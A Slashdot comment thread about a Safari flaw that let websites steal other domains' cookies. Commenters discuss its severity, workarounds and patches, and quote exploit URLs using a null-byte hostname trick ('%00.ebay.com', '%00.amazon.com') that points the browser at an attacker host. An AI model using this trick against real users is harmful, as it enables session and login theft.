Safari Security Hole Allows Cookie Theft 70
An anonymous reader writes "MacSlash posted a story about a vulnerability in Safari. The exploit allows someone to steal any of your domain-based cookies (passwords, private info, etc.) from any website. Mozilla and Internet Explorer had the same bug in the past."
PATCHED ALREADY! (Score:2, Informative)
as long as I'm reposting things from MacSlash here's one: see for your self by testing the exploit here [insecure.ws].
(Not) PATCHED ALREADY! (Score:3, Interesting)
Still see my ebay cookies.
Maybe you cleared your cookie cache or have accepting them turned off?
Re:PATCHED ALREADY! (Score:3, Informative)
Hey, at least repost the right stuff [macslash.org].
Re:PATCHED ALREADY! (Score:3, Interesting)
Re:PATCHED ALREADY! (Score:1)
ERROR
The requested URL could not be retrieved
While trying to process the request:
GET http://www.insecure.ws%00.ebay.com/cgi-bin/cook HTTP/1.1
Accept: */*
Accept-Language: en, ja;q=0.92, ja-jp;q=0.96, fr;q=0.88, de-de;q=0.85, de;q=0.81, es;q=0.77, it-it;q=0.73, it;q=0.69, nl-nl;q=0.65, nl;q=0.62, sv-se;q=0.58, sv;q=0.54, no-no;q=0.50, no;q=0.46, da-dk;q=0.42, da;q=0.38, fi-fi;q=0.35, fi;q=0.31, pt-pt;q=0.27, pt;q=0.23
Accept-Encoding: gzip, deflate;q=
Re:PATCHED ALREADY! (Score:2)
One good reason... (Score:3, Funny)
Re:One good reason... (Score:4, Informative)
But seriously, I think cookies are a safe and generally useful concept. I have third-party cookies blocked since these can be downloaded with adverts and track you using the http-referer field. However, first party cookies are almost always safe.
Not having to log in again at every single site just makes it easier, IMHO. I back up my cookie data more often than my bookmarks.
I wonder. (Score:2, Interesting)
Re:I wonder. (Score:5, Informative)
Potentially a bug could exist in the Javascript engine, and since Javascript can access cookies, and they could be stolen this way. However this particular bug doesn't appear to be JS-related, rather it's something more fundamental (but easily fixed by Apple, hopefully).
Since Konqueror uses KDE/QT's socket classes, whilst Safari uses the Carbon/Darwin sockets interface, it's unlikely the bug would rear it's head in Konqueror IMHO.
Re:I wonder. (Score:2)
Should watch similar products (Score:4, Insightful)
Cookie Theft (Score:5, Funny)
Apple: Who me?
Marc Slemko: Yes, you.
Apple: Couldn't be.
Marc Slemko: Then who?
Re:Cookie Theft (Score:3, Funny)
Slashdot: BURN HIM!
MacSlash: BURN HIM!
AppleLust: BURN HIM!
Think Secret: BURN HIM!
Steve Jobs: Tee hee. What a bunch of sheep.
Re:Cookie Theft (Score:2, Offtopic)
Safari and Konqueror (Score:2, Redundant)
I know Safari uses KHTML as its rendering engine (ala Konqueror). How much more of the Konqueror code is used in Safari and could Konq possibly face this same issue and no one has stumbled on it? Forgive me if it's a stupid question, I've had about 2 hours sleep, my car broke down after taking my wife to work at 4am, and now I have to wait up because it's too late to get back to sleep before picking her up and waking up my son. Sounds like a lousy country song, huh.
Re:Safari and Konqueror (Score:2)
Re:Safari and Konqueror (Score:1)
Re:Safari and Konqueror (Score:1)
Doesn't affect me? (Score:4, Informative)
Please wait while loading the script
You are stuck on this page ?
It means that your browser is not vulnerable, sorry, or maybe, not so
sorry, it's how the things should be !!!.
You can press the back button now
I am running Safari 1.1.1 (v100.1). Could it be because
of This Hint [macosxhints.com]?
Re:Doesn't affect me? (Score:2)
Re:Doesn't affect me? (Score:1)
Fix it, but... what's the fuss? (Score:5, Insightful)
Any security hole should be fixed, but this is not as serious as they make it sound.
Passwords? Private info? What serious web developer would be keeps these in a cookie? Cookies are not secure. They are stored unencrypted on the user's hard drive (where they are easily rifled through), and (as mentioned) there have been plenty of bugs in the past that have made their data accessible to John Q. Hacker.
Cookies are mostly used for storing session ids, or another meaningless number that links back to the real info stored in a database on the server (yes, you don't want a hacker reading your session id, but this is a much lower risk).
This is not just for security reasons -- it's because cookies are not reliable. Cookies get wiped out all the time (all browsers that I know of let you delete them, and I see lots of ads for software that offers to manage, delete, filter, or "clean them up" for me.
Also, cookie size is limited (and does this differ on the diff browsers? I know GET request size does), so you could screw yourself over if you were storing a user's personal info and their address was really long.
Why would you store username/password data in a cookie anyway? Most browsers do this for you now, *and* they are more secure about it. Hm.
These are the best practices I was taught, at any rate. I didn't checked slashcode before posting this... and I suppose it is true that best practices are not always followed.
Does anyone have a real sense of how often sensitive data is stored unencrypted in a cookie?
Re:Fix it, but... what's the fuss? (Score:5, Informative)
Re:Fix it, but... what's the fuss? (Score:2)
Re:Fix it, but... what's the fuss? (Score:2)
Re:Fix it, but... what's the fuss? (Score:2)
Re:Fix it, but... what's the fuss? (Score:3, Interesting)
Well... your Slasdot login is (hashed but stealable) in a cookie right now.
Perhaps that doesn't qualify as "serious", but don't come crying to me when your karma bottoms out after "you" post 500 goatse trolls in a row.Hash in your cookie (Score:3, Interesting)
Anyway, my post did have the caveat that I did NOT review slashcode before posting.... Honestly, though, slashdot seems to be designed so that you can have as much security as you want, even if that cookie has a hash of sensitive data instead of a temporary session id.
You can control whether your login (held in the cookie) lasts for the browser session only, vs. a whole year. You can also manually logout whenever you want (again, deletes the cookie).
If y
Hmm. (Score:2)
Hey, now; be nice. I thought I talked about this somewhere, but here's more detail.
You're right that session cookies are a security hole, but it's much harder to use them, because most of the time when you steal them they're useless. Sessions expire, or are closed on log-out.
If you do your banking online, do you log out? Do you close the browser? Or do you even wait 15 minutes before browing to the shadier parts of the internet? Any of those and you're safe.
Here
i new the cookie monster... (Score:1, Funny)
Another Hole... (Score:2, Funny)
Re:Another Hole... (Score:2)
That's not the biggest Safari bug (Score:2)
I have a gig free on my Ti and after a morning of browsing, it's down to 500Meg. Quitting Safari does not free up this space. Restarting does.
One would expect Safari to be much more well behaved because when the hard drive fills up, other apps often lose their prefs and general hell breaks lose.
REAL PITA.
Re:That's not the biggest Safari bug (Score:4, Informative)
Look in
And you will see... swapfile1, swapfile2... etc. The OS creates these as needed.
Now for the OS to recover swap space, there has no be no pages addressed to a swap file. When you run Safari what gets paged out to disk? Not safari, but all the other applications you are running. Therefore, quitting Safari does nothing. The OS won't page in the swap unless you need access to that page of memory.
Re:That's not the biggest Safari bug (Score:2)
Re:That's not the biggest Safari bug (Score:3, Informative)
Safari -> Empty Cache
or you could push cmd-option-E
i think your gripe is more that you can't control the size of your cache, but some creative partitioning with a side of fstab could fix that
my gripe is that safari doesn't seem to take advantage of the cache to the same extent that IE and Moz do, slowing down loading of mostly static pages and images
but i still prefer it to any other browser out there
Re:That's not the biggest Safari bug (Score:2)
Symptom of underlying problem (Score:3, Interesting)
temporary patch (Score:1, Informative)
Firebird (Score:1, Troll)
It is a great, feature rich [mozilla.org] browser. Of course you could also check out Mozilla 1.5 [mozilla.org], Camino [mozilla.org], Netscape [netscape.com], iCab [www.icab.de], Omni Web [omnigroup.com], Opera [opera.com], or even IE 5 or MSN for the Mac [microsoft.com]
All of these can be downloaded from their respective sites, or from the Internet Utilities [apple.com] section of Apple's Mac OS X Downloads [apple.com] page.
Cookie theft?! (Score:1, Funny)
OmniWeb and KHTML (Score:3, Informative)
As for the discussion as to whether this is a bug in KHTML in general, it is not. The bug is in the way browsers parse the hostname out of a URL differently for cookies and the connection itself. So in Safari the url:
http://www.EvilSite.com%00.amazon.com/
will connect to www.EvilSite.com, but be considered in the domain of
What about the CURRENT version of Safari? (Score:1, Interesting)
But if you proxy... (Score:2, Interesting)
Still, irritating bug.
Here is the fix for this exploit: (Score:3, Informative)
Fix available : CookieMonsterFix ? (Score:1)
I ran it against 10.2.8 + Safari 1.0.1 (v85.6) and it looks like it works. The readme says it works with Panther as well.
3rd Party Fix (Score:4, Interesting)
I was bit dubious at first, but the patch includes source code. I did install the supplied binary, though...
What I'm really surprised about however is the fact that a) a third-party developer can fix a problem like this at all, and how easily the fix can be hooked into Safari. It appears that this OpenStep/Cocoa framework stuff is really flexible...
Oh and yes, it does work!
Re:3rd Party Fix (Score:2)
64446 18 /Library/InputManagers/CookieMonsterFix/CookieMons terFix.bundle/Contents/MacOS/CookieMonsterFix /Users/stb/working/cookiemonsterfix/build/CookieMo nsterFix.bundle/Contents/MacOS/CookieMonsterFix
64446 18